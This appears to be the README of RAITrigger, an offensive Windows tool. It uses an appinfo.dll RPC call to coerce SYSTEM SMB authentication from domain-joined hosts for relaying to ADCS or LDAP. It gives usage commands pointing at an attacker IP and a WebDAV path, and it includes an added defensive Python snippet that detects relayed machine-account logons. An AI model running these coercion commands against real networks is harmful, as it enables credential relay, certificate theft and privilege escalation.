RAITrigger: Local SYSTEM auth trigger for relaying
RAITrigger
The RPC function RAiForceElevationPromptForCOM from the appinfo.dll library allows SYSTEM coercion. This only works on domain-joined systems. It turns out that any low-privileged user can call this function, not to spawn a process, but to trigger SYSTEM authentication to an arbitrary location. This is because CreateFileW is called as SYSTEM on the location given in the first input parameter.

As the low-privileged user is still impersonated, this cannot be used as a Potato trigger to elevate privileges from SeImpersonate to SYSTEM.

But with the incoming SMB authentication, it can be used to request a computer account certificate against ADCS when web enrollment is enabled. Or it can be used for LPE by relaying to LDAP when LDAP signing is not enabled.
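A detection-side view of the relay described above, as an added example that is not part of the original page or the RAITrigger project: a relayed computer-account authentication reaches the CA or domain controller from the relay host's address rather than from the coerced machine's own. The inventory, host names, addresses and events are constructed, and the helper names are hypothetical; the field names follow Security event 4624.

```python
import ipaddress

# Constructed inventory: computer account -> addresses it legitimately uses
# (assumption: exported from DNS/DHCP or a CMDB).
KNOWN_HOSTS = {
    "WS01$": {"10.0.5.21"},
    "WS02$": {"10.0.5.22", "fd00::22"},
}

# Constructed sample of Security 4624 events collected on a CA or DC.
SAMPLE_EVENTS = [
    {"EventID": 4624, "LogonType": 3, "TargetUserName": "WS01$", "IpAddress": "10.0.5.21", "Computer": "CA01"},
    {"EventID": 4624, "LogonType": 3, "TargetUserName": "WS01$", "IpAddress": "10.0.9.99", "Computer": "CA01"},
    {"EventID": 4624, "LogonType": 3, "TargetUserName": "alice", "IpAddress": "10.0.9.99", "Computer": "DC01"},
    {"EventID": 4624, "LogonType": 3, "TargetUserName": "WS02$", "IpAddress": "::ffff:10.0.5.22", "Computer": "DC01"},
    {"EventID": 4624, "LogonType": 3, "TargetUserName": "WS03$", "IpAddress": "10.0.5.23", "Computer": "DC01"},
    {"EventID": 4624, "LogonType": 5, "TargetUserName": "WS01$", "IpAddress": "-", "Computer": "WS01"},
]

def normalize_ip(raw):
    """Return a canonical address string, or None for '-', empty or junk."""
    try:
        ip = ipaddress.ip_address(raw.strip())
    except ValueError:
        return None
    # IPv4 peers are often logged as IPv4-mapped IPv6 (::ffff:a.b.c.d).
    if ip.version == 6 and ip.ipv4_mapped:
        ip = ip.ipv4_mapped
    return str(ip)

def find_relay_candidates(events, known_hosts):
    """Return (verdict, event) for network logons of computer accounts
    whose source address does not belong to that computer."""
    known = {k.upper(): {normalize_ip(a) for a in v} for k, v in known_hosts.items()}
    findings = []
    for ev in events:
        user = ev.get("TargetUserName", "").upper()
        if ev.get("EventID") != 4624 or ev.get("LogonType") != 3 or not user.endswith("$"):
            continue  # only network logons by computer accounts are of interest
        src = normalize_ip(ev.get("IpAddress", ""))
        if src is None:
            continue  # no usable source address logged
        if user not in known:
            findings.append(("unknown-host", ev))  # inventory gap, review manually
        elif src not in known[user]:
            findings.append(("ip-mismatch", ev))   # machine account seen from a foreign address
    return findings
```

An `ip-mismatch` hit on a CA or domain controller is the event to triage first; `unknown-host` hits usually point to an incomplete inventory.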
To trigger SMB authentication:
[*] RAITrigger.exe \\attackerip\test\test.exe
[*] RAITrigger.exe \\hostname@80\test\test.exe
Calling this function remotely (even as a local administrator) leads to rpc_access_denied, so this is no alternative to e.g. PetitPotam or similar.
